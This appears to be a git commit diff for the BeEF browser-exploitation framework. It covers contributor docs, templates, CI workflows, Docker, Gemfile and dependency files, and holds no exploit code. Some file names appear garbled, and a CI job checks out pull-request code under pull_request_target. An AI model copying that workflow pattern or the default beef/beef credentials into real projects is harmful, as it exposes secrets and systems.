Revert "Revert "Add support for the SuSE family in the installer (#2590 )" (#2594 )"

This reverts commit dc9e41c55a.
Bump sqlite3 from 1.5.2 to 1.5.3 (#2598 )
2022-10-13 13:31:38 +10:00 · 2022-10-13 13:27:21 +10:00 · 2022-10-13 13:07:56 +10:00 · 2022-10-13 13:07:26 +10:00 · 2022-10-13 13:07:14 +10:00 · 2022-10-13 13:07:00 +10:00
1494 changed files with 107379 additions and 17811 deletions
--- a/.bundle/config
+++ b/.bundle/config
@@ -0,0 +1,2 @@
+---
+BUNDLE_WITHOUT: "development:test"
--- a/.dockerignore
+++ b/.dockerignore
@@ -0,0 +1,9 @@
+# Don't copy over git files
+.git
+.github
+.gitignore
+doc
+docs
+scripts
+test
+update-beef
--- a/.github/CONTRIBUTING.md
+++ b/.github/CONTRIBUTING.md
@@ -0,0 +1,84 @@
+# Contributing
+### Anyone is welcome to make BeEF better!
+Thank you for wanting to contribute to BeEF. It's effort like yours that helps make BeEF such a great tool.
+
+Following these guidelines shows that you respect the time of the developers developing this open source project and helps them help you. In response to this, they should return that respect in addressing your issue, assisting with changes, and helping you finalize your pull requests.
+
+###  We want any form of helpful contributions!
+
+
+BeEF is an open source project and we love to receive contributions from the community! There are many ways to contribute, from writing tutorials or blog posts, improving or translating the documentation, answering questions on the project, submitting bug reports and feature requests or writing or reviewing code which can be merged into BeEF itself.
+
+# Ground Rules
+
+###  Responsibilities
+> * When making an issue, ensure the issue template is filled out, failure to do so can and will result in a closed ticket and a delay in support.
+> * We now have a two-week of unresponsiveness period before closing a ticket, if this happens, just comment responding to the issue which will re-open the ticket. Ensure to make sure all information requested is provided.
+> * Ensure cross-platform compatibility for every change that's accepted. Mac and Linux are currently supported.
+> * Create issues for any major changes and enhancements that you wish to make. Discuss things transparently and get community feedback.
+> * Ensure language is as respectful and appropriate as possible. 
+> * Keep merges as straightforward as possible, only address one issue per commit where possible.
+> * Be welcoming to newcomers and try to assist where possible, everyone needs help. 
+
+# Where to start
+### Looking to make your first contribution 
+
+ Unsure where to begin contributing to BeEF? You can start by looking through these issues:
+
+ * Good First Issue - issues which should only require a few changes, and are good to start with.
+ * Question - issues which are a question and need a response. A good way to learn more about BeEF is to try to solve a problem.
+
+At this point, you're ready to make your changes! Feel free to ask for help; everyone is a beginner at first.
+
+If a maintainer asks you to "rebase" your PR, they're saying that code has changed, and that you need to update your branch so it's easier to merge.
+
+### Ruby best practise 
+Do read through: https://rubystyle.guide
+Try and follow through with the practices throughout, even going through it once will help keep the codebase consistent.
+Use Rubocop to help ensure that the changes adhere to current standards, we are currently catching up old codebase to match.
+Just run the following in the /beef directory.
+> rubocop
+
+# Getting started
+
+### How to submit a contribution.
+
+1. Create your own fork of the code
+
+2. Checkout the master branch
+> git checkout master
+
+3. Create a new branch for your feature
+> git checkout -b my-cool-new-feature
+
+4. Add your new files
+> git add modules/my-cool-new-module
+
+5. Modify or write a test case/s in Rspec for your changes
+
+6. Commit your changes with a relevant message
+> git commit
+
+7. Push your changes to GitHub
+> git push origin my-cool-new-feature
+
+8. Run all tests again to make sure they all pass
+
+9. Edit existing wiki page / add a new one explaining the new features, including:
+	- sample usage (command snippets, steps and/or screenshots)
+	- internal working (code snippets & explanation)
+
+10. Now browse to the following URL and create your pull request from your fork to beef master
+    - Fill out the Pull Request Template
+    - https://github.com/beefproject/beef/pulls
+
+
+# How to report a bug
+If you find a security vulnerability, do NOT open an issue. Email security@beefproject.com instead.
+
+When the security team receives a security bug email, they will assign it to a primary handler.
+This person will coordinate the fix and release process, involving the following steps:
+
+* Confirm the problem and find the affected versions.
+* Audit code to find any potential similar problems.
+* Prepare fixes
--- a/.github/ISSUE_TEMPLATE.md
+++ b/.github/ISSUE_TEMPLATE.md
@@ -1,49 +1,31 @@
-Verify first that your issue/request has not been posted previously:
+## First Steps

-* https://github.com/beefproject/beef/issues
-* https://github.com/beefproject/beef/wiki/FAQ
+1. Confirm that your issue has not been posted previously by searching here: https://github.com/beefproject/beef/issues
+2. Confirm that the wiki does not contain the answers you seek: https://github.com/beefproject/beef/wiki
+3. Check the FAQ: https://github.com/beefproject/beef/wiki/FAQ
+4. BeEF Version:
+5. Ruby Version:
+6. Browser Details (e.g. Chrome v81.0):
+7. Operating System (e.g. OSX Catalina):

-Ensure you're using the [latest version of BeEF](https://github.com/beefproject/beef/releases/tag/beef-0.4.7.2).
+## Configuration

+1. Have you made any changes to your BeEF configuration? Yes/No
+2. Have you enabled or disabled any BeEF extensions? Yes/No

-#### Environment
+## Steps to Reproduce

-What version/revision of BeEF are you using?
+1. (eg. I ran install script, which ran fine)
+2. (eg. when launching console with './beef' I get an error as follows: <error here>)
+3. (eg. beef does not launch)

-On what version of Ruby?
+## How to enable and capture detailed logging

-On what browser?
+1. Edit `config.yaml` in the root directory
+   * If using Kali **beef-xss** the root dir will be  `/usr/share/beef-xss`
+2. Update `client_debug` to `true`
+3. Retrieve browser logs from your browser's developer console (Ctrl + Shift + I or F12 depending on browser)
+4. Retrieve your server-side logs from `~/.beef/beef.log`
+   * If using **beef-xss** logs found with `journalctl -u beef-xss`

-On what operating system?
-
-
-#### Configuration
-
-Are you using a non-default configuration?
-
-Have you enabled or disabled any BeEF extensions?
-
-
-#### Summary
-
-Please provide a summary of the issue.
-
-
-#### Expected Behaviour
-
-What was the expected result?
-
-
-#### Actual Behaviour
-
-What was the actual result?
-
-
-#### Steps to Reproduce
-
-Please provide steps to reproduce this issue.
-
-
-#### Additional Information
-
-Please provide any additional information which may be useful in resolving this issue, such as debugging output and relevant screen shots. Debug output can be enabled by specifying `debug: true` in the `config.yaml` configuration file.
+**If we request additional information and we don't hear back from you within a week, we will be closing the ticket off.**
--- a/.github/PULL_REQUEST_TEMPLATE.md
+++ b/.github/PULL_REQUEST_TEMPLATE.md
@@ -0,0 +1,20 @@
+# Pull Request
+
+Thanks for submitting a PR! Please fill in this template where appropriate:
+
+## Category
+*e.g. Bug, Module, Extension, Core Functionality, Documentation, Tests*
+
+## Feature/Issue Description
+**Q:** Please give a brief summary of your feature/fix
+**A:**
+
+**Q:** Give a technical rundown of what you have changed (if applicable)
+**A:**
+
+## Test Cases
+**Q:** Describe your test cases, what you have covered and if there are any use cases that still need addressing.
+**A:**
+
+## Wiki Page
+*If you are adding a new feature that is not easily understood without context, please draft a section to be added to the Wiki below.*
--- a/.github/SECURITY.md
+++ b/.github/SECURITY.md
@@ -0,0 +1,9 @@
+send security bug reports to security@beefproject.com
+
+**A security report should include:**
+
+1. Description of the problem (what it is, what's the impact)
+
+2. Technical steps to replicate it (commands / screenshots)
+
+3. Actionable fix/recommendations to mitigate the issue
--- a/.github/dependabot.yml
+++ b/.github/dependabot.yml
@@ -0,0 +1,25 @@
+version: 2
+updates:
+- package-ecosystem: npm
+  directory: "/"
+  schedule:
+    interval: daily
+  open-pull-requests-limit: 10
+  ignore:
+  - dependency-name: jsdoc-to-markdown
+    versions:
+    - 7.0.0
+- package-ecosystem: bundler
+  directory: "/"
+  schedule:
+    interval: daily
+  open-pull-requests-limit: 10
+  ignore:
+  - dependency-name: rubocop
+    versions:
+    - 1.10.0
+    - 1.11.0
+    - 1.12.0
+    - 1.12.1
+    - 1.9.0
+    - 1.9.1
--- a/.github/workflows/codeql.yml
+++ b/.github/workflows/codeql.yml
@@ -0,0 +1,72 @@
+# For most projects, this workflow file will not need changing; you simply need
+# to commit it to your repository.
+#
+# You may wish to alter this file to override the set of languages analyzed,
+# or to provide custom queries or build logic.
+#
+# ******** NOTE ********
+# We have attempted to detect the languages in your repository. Please check
+# the `language` matrix defined below to confirm you have the correct set of
+# supported CodeQL languages.
+#
+name: "CodeQL"
+
+on:
+  push:
+    branches: [ master ]
+  pull_request:
+    # The branches below must be a subset of the branches above
+    branches: [ master ]
+  schedule:
+    - cron: '36 1 * * 0'
+
+jobs:
+  analyze:
+    name: Analyze
+    runs-on: ubuntu-latest
+    permissions:
+      actions: read
+      contents: read
+      security-events: write
+
+    strategy:
+      fail-fast: false
+      matrix:
+        language: [ 'javascript', 'ruby' ]
+        # CodeQL supports [ 'cpp', 'csharp', 'go', 'java', 'javascript', 'python', 'ruby' ]
+        # Learn more about CodeQL language support at https://aka.ms/codeql-docs/language-support
+
+    steps:
+    - name: Checkout repository
+      uses: actions/checkout@v3
+
+    # Initializes the CodeQL tools for scanning.
+    - name: Initialize CodeQL
+      uses: github/codeql-action/init@v2
+      with:
+        languages: ${{ matrix.language }}
+        # If you wish to specify custom queries, you can do so here or in a config file.
+        # By default, queries listed here will override any specified in a config file.
+        # Prefix the list here with "+" to use these queries and those in the config file.
+        
+        # Details on CodeQL's query packs refer to : https://docs.github.com/en/code-security/code-scanning/automatically-scanning-your-code-for-vulnerabilities-and-errors/configuring-code-scanning#using-queries-in-ql-packs
+        queries: security-extended,security-and-quality
+
+        
+    # Autobuild attempts to build any compiled languages  (C/C++, C#, or Java).
+    # If this step fails, then you should remove it and run the build manually (see below)
+    # - name: Autobuild
+    #  uses: github/codeql-action/autobuild@v2
+
+    # ℹ️ Command-line programs to run using the OS shell.
+    # 📚 See https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idstepsrun
+
+    #   If the Autobuild fails above, remove it and uncomment the following three lines. 
+    #   modify them (or add more) to build your code if your project, please refer to the EXAMPLE below for guidance.
+
+    # - run: |
+    #   echo "Run, Build Application using script"
+    #   ./location_of_script_within_repo/buildscript.sh
+
+    - name: Perform CodeQL Analysis
+      uses: github/codeql-action/analyze@v2
--- a/.github/workflows/github_actions.yml
+++ b/.github/workflows/github_actions.yml
@@ -0,0 +1,59 @@
+name: 'BrowserStack Test'
+
+on:
+  pull_request_target:
+    branches: [ master ]
+      
+jobs:
+  approve:
+    runs-on: ubuntu-latest
+
+    steps:
+    - name: Approve
+      run: echo For security reasons, all pull requests need to be approved first before running any automated CI.
+      
+  ubuntu-job:
+    name: 'BrowserStack Test on Ubuntu'
+    runs-on: ubuntu-latest  # Can be self-hosted runner also
+    environment:
+      name: Integrate Pull Request
+    env: 
+      GITACTIONS: true
+    steps:
+
+      - name: 'BrowserStack Env Setup'  # Invokes the setup-env action
+        uses: browserstack/github-actions/setup-env@master
+        with:
+          username:  ${{ secrets.BROWSERSTACK_USERNAME }}
+          access-key: ${{ secrets.BROWSERSTACK_ACCESS_KEY }}
+
+      - name: 'BrowserStack Local Tunnel Setup'  # Invokes the setup-local action
+        uses: browserstack/github-actions/setup-local@master
+        with:
+          local-testing: start
+          local-identifier: random
+
+      - name: 'Checkout the repository'
+        uses: actions/checkout@v2
+        with:
+          ref: ${{ github.event.pull_request.head.sha }}
+          fetch-depth: 2
+
+      - name: 'Setting up Ruby'
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: 3.0.3 # Not needed with a .ruby-version file
+
+      - name: 'Build and run tests'
+        run: |
+          sudo apt update
+          sudo apt install libcurl4 libcurl4-openssl-dev
+          bundle config unset --local without
+          bundle config set --local with 'test' 'development'
+          bundle install
+          bundle exec rake browserstack --trace
+
+      - name: 'BrowserStackLocal Stop'  # Terminating the BrowserStackLocal tunnel connection
+        uses: browserstack/github-actions/setup-local@master
+        with:
+          local-testing: stop
--- a/.github/workflows/stale.yml
+++ b/.github/workflows/stale.yml
@@ -0,0 +1,35 @@
+# This workflow warns and then closes issues and PRs that have had no activity for a specified amount of time.
+#
+# You can adjust the behavior by modifying this file.
+# For more information, see:
+# https://github.com/actions/stale
+name: Mark stale issues and pull requests
+
+on:
+  schedule:
+  - cron: '5 * * * *'
+
+jobs:
+  stale:
+
+    runs-on: ubuntu-latest
+    permissions:
+      issues: write
+      pull-requests: write
+
+    steps:
+    - uses: actions/stale@v5
+      with:
+        repo-token: ${{ secrets.GITHUB_TOKEN }}
+        days-before-stale: 7
+        days-before-pr-stale: 14
+        days-before-close: 7
+        days-before-pr-close: 14
+        stale-issue-message: 'This issue as been marked as stale due to inactivity and will be closed in 7 days'
+        stale-pr-message: 'Stale pull request message'
+        stale-issue-label: 'Stale'
+        stale-pr-label: 'no-pr-activity'
+        exempt-issue-labels: 'Critical, High, Low, Medium, Review, Backlog'
+        exempt-milestones: true
+        exempt-draft-pr: true
+        start-date: '2022-06-15'
--- a/.gitignore
+++ b/.gitignore
@@ -9,13 +9,21 @@ custom-config.yaml
 .rvmrc
 beef.log

-*.lock

 extensions/metasploit/msf-exploits.cache

 # ruby debugging
 .byebug_history

+# Bundler
+/.bundle
+/vendor
+
+#simplecov
+coverage/
+
+# BrowserStack
+local.log

 # The following lines were created by https://www.gitignore.io

@@ -110,3 +118,11 @@ $RECYCLE.BIN/

 test/thirdparty/msf/unit/.byebug_history
 /load
+
+### JSDoc ###
+# Dependency directories
+node_modules/
+
+# Generated files
+out/
+doc/rdoc/
--- a/.rubocop.yml
+++ b/.rubocop.yml
@@ -4,21 +4,39 @@ AllCops:
    - 'tmp/**/*'
    - 'tools/**/*'
    - 'doc/**/*'
-  TargetRubyVersion: 2.4
+  TargetRubyVersion: 3.0
+  NewCops: enable
+
+Layout/LineLength:
+  Enabled: true
+  Max: 180

 Metrics/AbcSize:
  Enabled: false
+
 Metrics/BlockLength:
  Enabled: false
+
 Metrics/ClassLength:
  Enabled: false
-Metrics/LineLength:
-  Enabled: false
+
 Metrics/MethodLength:
  Enabled: false
+
+Metrics/ModuleLength:
+  Enabled: false
+
 Metrics/PerceivedComplexity:
  Enabled: false
+
 Metrics/CyclomaticComplexity:
  Enabled: false
+
+Naming/ClassAndModuleCamelCase:
+  Enabled: false
+
 Style/FrozenStringLiteralComment:
  Enabled: false
+
+Style/Documentation:
+  Enabled: false
--- a/.ruby-version
+++ b/.ruby-version
@@ -1 +1 @@
-2.5.3
+3.0.3
--- a/.travis.yml
+++ b/.travis.yml
@@ -1,22 +0,0 @@
-language: ruby
-rvm:
-  - 2.4.0
-  - 2.5.3
-  - 2.6.0
-notifications:
-  email:
-    recipients:
-      - wade@bindshell.net
-    on_success: always
-    on_failure: always
-addons:
-  apt:
-    packages:
-      - libsqlite3-dev
-      - build-essential
-      - patch
-      - ruby-dev
-      - zlib1g-dev
-      - liblzma-dev
-      - libcurl4-openssl-dev
-
--- a/BeEF.postman_environment.json
+++ b/BeEF.postman_environment.json
@@ -0,0 +1,49 @@
+{
+	"id": "3b5f29e6-c8eb-4d23-bf52-c01255f22f08",
+	"name": "BeEF",
+	"values": [
+		{
+			"key": "hostname",
+			"value": "127.0.0.1",
+			"enabled": true
+		},
+		{
+			"key": "username",
+			"value": "beef",
+			"enabled": true
+		},
+		{
+			"key": "password",
+			"value": "beef",
+			"enabled": true
+		},
+		{
+			"key": "token",
+			"value": "",
+			"enabled": true
+		},
+		{
+			"key": "session",
+			"value": "",
+			"enabled": true
+		},
+		{
+			"key": "module_id",
+			"value": "",
+			"enabled": true
+		},
+		{
+			"key": "cmd_id",
+			"value": "",
+			"enabled": true
+		},
+		{
+			"key": "dnsrule_id",
+			"value": "",
+			"enabled": true
+		}
+	],
+	"_postman_variable_scope": "environment",
+	"_postman_exported_at": "2020-01-03T06:00:29.827Z",
+	"_postman_exported_using": "Postman/7.14.0"
+}
--- a/63
+++ b/63
@@ -0,0 +1,63 @@
+###########################################################################################################
+###########################################################################################################
+##                                                                                                       ##
+##   Please read the Wiki Installation section on set-up using Docker prior to building this container.  ##
+##   BeEF does NOT allow authentication with default credentials. So please, at the very least           ##
+##   change the username:password in the config.yaml file to something secure that is not beef:beef      ##
+##   before building or you will to denied access and have to rebuild anyway.                            ##
+##                                                                                                       ##
+###########################################################################################################
+###########################################################################################################
+
+# ---------------------------- Start of Builder 0 - Gemset Build ------------------------------------------
+FROM ruby:2.7.5-alpine AS builder
+LABEL maintainer="Beef Project: github.com/beefproject/beef"
+
+# Install gems in parallel with 4 workers to expedite build process.=
+ARG BUNDLER_ARGS="--jobs=4"
+
+# Set gemrc config to install gems without Ruby Index (ri) and Ruby Documentation (rdoc) files
+RUN echo "gem: --no-ri --no-rdoc" > /etc/gemrc
+
+COPY . /beef
+
+# Add bundler/gem dependencies and then install
+RUN apk add --no-cache git curl libcurl curl-dev ruby-dev libffi-dev make g++ gcc musl-dev zlib-dev sqlite-dev && \
+  bundle install --gemfile=/beef/Gemfile $BUNDLER_ARGS && \
+  # Temp fix for https://github.com/bundler/bundler/issues/6680
+  rm -rf /usr/local/bundle/cache
+
+WORKDIR /beef
+
+# So we don't need to run as root
+RUN chmod -R a+r /usr/local/bundle
+# ------------------------------------- End of Builder 0 -------------------------------------------------
+
+
+# ---------------------------- Start of Builder 1 - Final Build ------------------------------------------
+FROM ruby:2.7.5-alpine
+LABEL maintainer="Beef Project: github.com/beefproject/beef"
+
+# Create service account to run BeEF
+RUN adduser -h /beef -g beef -D beef
+
+COPY --chown=1000:1000 . /beef
+
+# Use gemset created by the builder above
+COPY --from=builder /usr/local/bundle /usr/local/bundle
+
+# Install BeEF's runtime dependencies
+RUN apk add --no-cache curl git build-base openssl readline-dev zlib zlib-dev libressl-dev yaml-dev sqlite-dev sqlite libxml2-dev libxslt-dev autoconf libc6-compat ncurses automake libtool bison nodejs
+
+WORKDIR /beef
+
+# Ensure we are using our service account by default
+USER beef
+
+# Expose UI, Proxy, WebSocket server, and WebSocketSecure server
+EXPOSE 3000 6789 61985 61986
+
+HEALTHCHECK --interval=30s --timeout=30s --start-period=5s --retries=3 CMD [ "curl", "-fS", "localhost:3000" ]
+
+ENTRYPOINT ["/beef/beef"]
+# ------------------------------------- End of Builder 1 -------------------------------------------------
--- a/34
+++ b/34
@@ -1,18 +1,19 @@
-# BeEF's Gemfile
-
 #
-# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
+#gem 'simplecov', require: false, group: :test
+
+gem 'net-smtp', require: false

 gem 'eventmachine'
 gem 'thin'
-gem 'sinatra'
-gem 'rack'
-gem 'rack-protection'
+gem 'sinatra', '>= 2.2.0'
+gem 'rack', '>= 2.2.4'
+gem 'rack-protection', '>= 2.2.0'
 gem 'em-websocket' # WebSocket support
-gem 'uglifier'
+gem 'uglifier', '>= 4.2.0'
 gem 'mime-types'
 gem 'execjs'
 gem 'ansi'
@@ -20,11 +21,10 @@ gem 'term-ansicolor', :require => 'term/ansicolor'
 gem 'json'
 gem 'rubyzip', '>= 1.2.2'
 gem 'espeak-ruby', '>= 1.0.4' # Text-to-Voice
-gem 'nokogiri', '>= 1.10.4'
-gem 'rake'
-
-gem 'otr-activerecord'
+gem 'rake', '>= 13.0'
+gem 'otr-activerecord', '>= 1.4.2'
 gem 'sqlite3'
+gem 'rubocop', '~> 1.36.0', require: false

 # Geolocation support
 group :geoip do
@@ -42,17 +42,19 @@ end

 # Notifications extension
 group :ext_notifications do
+  gem 'unf'
+  gem 'domain_name', '>= 0.5.20190701'
  # Pushover
  gem 'rushover'
  # Slack
  gem 'slack-notifier'
  # Twitter
-  gem 'twitter', '>= 5.0.0'
+  gem 'twitter', '>= 7.0.0'
 end

 # DNS extension
 group :ext_dns do
-  gem 'rubydns', '~> 0.7.3'
+  gem 'async-dns'
 end

 # QRcode extension
@@ -65,7 +67,7 @@ group :test do
    gem 'test-unit'
    gem 'test-unit-full'
    gem 'rspec'
-	gem 'rdoc'
+    gem 'rdoc'
    # curb gem requires curl libraries
    # sudo apt-get install libcurl4-openssl-dev
    gem 'curb'
@@ -78,9 +80,11 @@ group :test do
    # sudo port install libxml2 libxslt
    gem 'capybara'
    # RESTful API tests/generic command module tests
-    gem 'rest-client', '>= 2.0.1'
+    gem 'rest-client', '>= 2.1.0'
    gem 'irb'
    gem 'pry-byebug'
+    gem "websocket-client-simple", "~> 0.6.0"
+    gem "browserstack-local", "~> 1.4"
 end

 source 'https://rubygems.org'
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -0,0 +1,309 @@
+GEM
+  remote: https://rubygems.org/
+  specs:
+    activemodel (7.0.3.1)
+      activesupport (= 7.0.3.1)
+    activerecord (7.0.3.1)
+      activemodel (= 7.0.3.1)
+      activesupport (= 7.0.3.1)
+    activesupport (7.0.3.1)
+      concurrent-ruby (~> 1.0, >= 1.0.2)
+      i18n (>= 1.6, < 2)
+      minitest (>= 5.1)
+      tzinfo (~> 2.0)
+    addressable (2.8.0)
+      public_suffix (>= 2.0.2, < 5.0)
+    ansi (1.5.0)
+    archive-zip (0.12.0)
+      io-like (~> 0.3.0)
+    ast (2.4.2)
+    async (1.30.3)
+      console (~> 1.10)
+      nio4r (~> 2.3)
+      timers (~> 4.1)
+    async-dns (1.3.0)
+      async-io (~> 1.15)
+    async-io (1.33.0)
+      async
+    browserstack-local (1.4.0)
+    buftok (0.2.0)
+    byebug (11.1.3)
+    capybara (3.37.1)
+      addressable
+      matrix
+      mini_mime (>= 0.1.3)
+      nokogiri (~> 1.8)
+      rack (>= 1.6.0)
+      rack-test (>= 0.6.3)
+      regexp_parser (>= 1.5, < 3.0)
+      xpath (~> 3.2)
+    childprocess (4.1.0)
+    coderay (1.1.3)
+    concurrent-ruby (1.1.10)
+    console (1.15.3)
+      fiber-local
+    curb (1.0.1)
+    daemons (1.4.1)
+    diff-lcs (1.5.0)
+    domain_name (0.5.20190701)
+      unf (>= 0.0.5, < 1.0.0)
+    em-websocket (0.5.3)
+      eventmachine (>= 0.12.9)
+      http_parser.rb (~> 0)
+    equalizer (0.0.11)
+    erubis (2.7.0)
+    espeak-ruby (1.1.0)
+    event_emitter (0.2.6)
+    eventmachine (1.2.7)
+    execjs (2.8.1)
+    ffi (1.15.5)
+    ffi-compiler (1.0.1)
+      ffi (>= 1.0.0)
+      rake
+    fiber-local (1.0.0)
+    geckodriver-helper (0.24.0)
+      archive-zip (~> 0.7)
+    hashie (5.0.0)
+    hashie-forbidden_attributes (0.1.1)
+      hashie (>= 3.0)
+    http (4.4.1)
+      addressable (~> 2.3)
+      http-cookie (~> 1.0)
+      http-form_data (~> 2.2)
+      http-parser (~> 1.2.0)
+    http-accept (1.7.0)
+    http-cookie (1.0.5)
+      domain_name (~> 0.5)
+    http-form_data (2.3.0)
+    http-parser (1.2.3)
+      ffi-compiler (>= 1.0, < 2.0)
+    http_parser.rb (0.6.0)
+    i18n (1.12.0)
+      concurrent-ruby (~> 1.0)
+    io-console (0.5.11)
+    io-like (0.3.1)
+    irb (1.4.2)
+      reline (>= 0.3.0)
+    json (2.6.2)
+    matrix (0.4.2)
+    maxmind-db (1.1.1)
+    memoizable (0.4.2)
+      thread_safe (~> 0.3, >= 0.3.1)
+    method_source (1.0.0)
+    mime-types (3.4.1)
+      mime-types-data (~> 3.2015)
+    mime-types-data (3.2022.0105)
+    mini_mime (1.1.2)
+    minitest (5.16.2)
+    mojo_magick (0.6.7)
+    msfrpc-client (1.1.2)
+      msgpack (~> 1)
+    msgpack (1.5.4)
+    multipart-post (2.2.3)
+    mustermann (3.0.0)
+      ruby2_keywords (~> 0.0.1)
+    naught (1.1.0)
+    net-protocol (0.1.3)
+      timeout
+    net-smtp (0.3.2)
+      net-protocol
+    netrc (0.11.0)
+    nio4r (2.5.8)
+    nokogiri (1.13.8-x86_64-linux)
+      racc (~> 1.4)
+    otr-activerecord (2.1.1)
+      activerecord (>= 4.0, < 7.1)
+      hashie-forbidden_attributes (~> 0.1)
+    parallel (1.22.1)
+    parseconfig (1.1.2)
+    parser (3.1.2.1)
+      ast (~> 2.4.1)
+    power_assert (2.0.1)
+    pry (0.14.1)
+      coderay (~> 1.1)
+      method_source (~> 1.0)
+    pry-byebug (3.10.1)
+      byebug (~> 11.0)
+      pry (>= 0.13, < 0.15)
+    psych (4.0.4)
+      stringio
+    public_suffix (4.0.7)
+    qr4r (0.6.1)
+      mojo_magick (~> 0.6.5)
+      rqrcode_core (~> 0.1)
+    racc (1.6.0)
+    rack (2.2.4)
+    rack-protection (3.0.2)
+      rack
+    rack-test (2.0.2)
+      rack (>= 1.3)
+    rainbow (3.1.1)
+    rake (13.0.6)
+    rdoc (6.4.0)
+      psych (>= 4.0.0)
+    regexp_parser (2.5.0)
+    reline (0.3.1)
+      io-console (~> 0.5)
+    rest-client (2.1.0)
+      http-accept (>= 1.7.0, < 2.0)
+      http-cookie (>= 1.0.2, < 2.0)
+      mime-types (>= 1.16, < 4.0)
+      netrc (~> 0.8)
+    rexml (3.2.5)
+    rqrcode_core (0.2.0)
+    rr (3.1.0)
+    rspec (3.11.0)
+      rspec-core (~> 3.11.0)
+      rspec-expectations (~> 3.11.0)
+      rspec-mocks (~> 3.11.0)
+    rspec-core (3.11.0)
+      rspec-support (~> 3.11.0)
+    rspec-expectations (3.11.0)
+      diff-lcs (>= 1.2.0, < 2.0)
+      rspec-support (~> 3.11.0)
+    rspec-mocks (3.11.1)
+      diff-lcs (>= 1.2.0, < 2.0)
+      rspec-support (~> 3.11.0)
+    rspec-support (3.11.0)
+    rubocop (1.36.0)
+      json (~> 2.3)
+      parallel (~> 1.10)
+      parser (>= 3.1.2.1)
+      rainbow (>= 2.2.2, < 4.0)
+      regexp_parser (>= 1.8, < 3.0)
+      rexml (>= 3.2.5, < 4.0)
+      rubocop-ast (>= 1.20.1, < 2.0)
+      ruby-progressbar (~> 1.7)
+      unicode-display_width (>= 1.4.0, < 3.0)
+    rubocop-ast (1.21.0)
+      parser (>= 3.1.1.0)
+    ruby-progressbar (1.11.0)
+    ruby2_keywords (0.0.5)
+    rubyzip (2.3.2)
+    rushover (0.3.0)
+      json
+      rest-client
+    selenium-webdriver (4.5.0)
+      childprocess (>= 0.5, < 5.0)
+      rexml (~> 3.2, >= 3.2.5)
+      rubyzip (>= 1.2.2, < 3.0)
+      websocket (~> 1.0)
+    simple_oauth (0.3.1)
+    sinatra (3.0.2)
+      mustermann (~> 3.0)
+      rack (~> 2.2, >= 2.2.4)
+      rack-protection (= 3.0.2)
+      tilt (~> 2.0)
+    slack-notifier (2.4.0)
+    sqlite3 (1.5.3-x86_64-linux)
+    stringio (3.0.2)
+    sync (0.5.0)
+    term-ansicolor (1.7.1)
+      tins (~> 1.0)
+    test-unit (3.5.5)
+      power_assert
+    test-unit-context (0.5.1)
+      test-unit (>= 2.4.0)
+    test-unit-full (0.0.5)
+      test-unit
+      test-unit-context
+      test-unit-notify
+      test-unit-rr
+      test-unit-runner-tap
+    test-unit-notify (1.0.4)
+      test-unit (>= 2.4.9)
+    test-unit-rr (1.0.5)
+      rr (>= 1.1.1)
+      test-unit (>= 2.5.2)
+    test-unit-runner-tap (1.1.2)
+      test-unit
+    thin (1.8.1)
+      daemons (~> 1.0, >= 1.0.9)
+      eventmachine (~> 1.0, >= 1.0.4)
+      rack (>= 1, < 3)
+    thread_safe (0.3.6)
+    tilt (2.0.11)
+    timeout (0.3.0)
+    timers (4.3.3)
+    tins (1.31.1)
+      sync
+    twitter (7.0.0)
+      addressable (~> 2.3)
+      buftok (~> 0.2.0)
+      equalizer (~> 0.0.11)
+      http (~> 4.0)
+      http-form_data (~> 2.0)
+      http_parser.rb (~> 0.6.0)
+      memoizable (~> 0.4.0)
+      multipart-post (~> 2.0)
+      naught (~> 1.0)
+      simple_oauth (~> 0.3.0)
+    tzinfo (2.0.5)
+      concurrent-ruby (~> 1.0)
+    uglifier (4.2.0)
+      execjs (>= 0.3.0, < 3)
+    unf (0.1.4)
+      unf_ext
+    unf_ext (0.0.8.2)
+    unicode-display_width (2.2.0)
+    webrick (1.7.0)
+    websocket (1.2.9)
+    websocket-client-simple (0.6.0)
+      event_emitter
+      websocket
+    xmlrpc (0.3.2)
+      webrick
+    xpath (3.2.0)
+      nokogiri (~> 1.8)
+
+PLATFORMS
+  x86_64-linux
+
+DEPENDENCIES
+  ansi
+  async-dns
+  browserstack-local (~> 1.4)
+  capybara
+  curb
+  domain_name (>= 0.5.20190701)
+  em-websocket
+  erubis
+  espeak-ruby (>= 1.0.4)
+  eventmachine
+  execjs
+  geckodriver-helper
+  irb
+  json
+  maxmind-db
+  mime-types
+  msfrpc-client
+  net-smtp
+  otr-activerecord (>= 1.4.2)
+  parseconfig
+  pry-byebug
+  qr4r
+  rack (>= 2.2.4)
+  rack-protection (>= 2.2.0)
+  rake (>= 13.0)
+  rdoc
+  rest-client (>= 2.1.0)
+  rspec
+  rubocop (~> 1.36.0)
+  rubyzip (>= 1.2.2)
+  rushover
+  selenium-webdriver
+  sinatra (>= 2.2.0)
+  slack-notifier
+  sqlite3
+  term-ansicolor
+  test-unit
+  test-unit-full
+  thin
+  twitter (>= 7.0.0)
+  uglifier (>= 4.2.0)
+  unf
+  websocket-client-simple (~> 0.6.0)
+  xmlrpc
+
+BUNDLED WITH
+   2.3.14
--- a/INSTALL.txt
+++ b/INSTALL.txt
@@ -1,6 +1,6 @@
 ===============================================================================
   
-    Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+    Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
    Browser Exploitation Framework (BeEF) - http://beefproject.com
    See the file 'doc/COPYING' for copying permission

@@ -21,9 +21,9 @@ Or cloning the Git repository from Github:
 Prerequisites
 --------------

-BeEF requires Ruby 2.4+.
+BeEF requires Ruby 2.7+.

-If your operating system package manager does not support Ruby version 2.4,
+If your operating system package manager does not support Ruby version 2.7,
 you can add the brightbox ppa repository for the latest version of Ruby:

  $ sudo apt-add-repository -y ppa:brightbox/ruby-ng
@@ -67,5 +67,11 @@ it's best to regularly update BeEF to the latest version.

 If you're using BeEF from the GitHub repository, updating is as simple as:

-  $ git pull
+  $ ./update-beef
+
+Or pull the latest repo yourself and then update the gems with:
+  
+  $ git pull
+  
+  $ bundle

--- a/README.md
+++ b/README.md
@@ -1,6 +1,6 @@
 ===============================================================================

